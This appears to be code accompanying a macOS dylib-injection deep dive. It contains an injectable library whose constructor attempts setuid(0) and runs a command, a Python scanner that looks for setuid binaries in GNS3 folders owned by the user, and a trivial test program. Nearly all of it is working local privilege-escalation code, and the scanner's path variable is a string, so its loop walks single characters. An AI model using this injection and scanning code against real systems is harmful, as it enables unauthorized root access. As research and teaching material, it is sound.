DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive

inject.c

#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
 {
	setuid(0);
 	system("id");
	printf("Hello from dylib!\n");
	syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

suid.py

#!/usr/bin/python3

import os
import getpass
from pathlib import Path

binaryPaths = ('/Applications/GNS3/Resources/')
username = getpass.getuser()

for binaryPath in binaryPaths:
	for rootDir,subDirs,subFiles in os.walk(binaryPath):
		for subFile in subFiles:
			absPath = os.path.join(rootDir,subFile)
			try:
				permission = oct(os.stat(absPath).st_mode)[-4:]
				specialPermission = permission[0]
				if int(specialPermission) >= 4:
					p = Path(os.path.abspath(os.path.join(absPath, os.pardir)))
					if p.owner() == username:
						print("Potential issue found, owner of parent folder is:", username)
						print(permission , absPath)
			except:
				pass

test.c

#include <stdio.h>

int main() {
	printf("Hello world\n");
    return 0;
}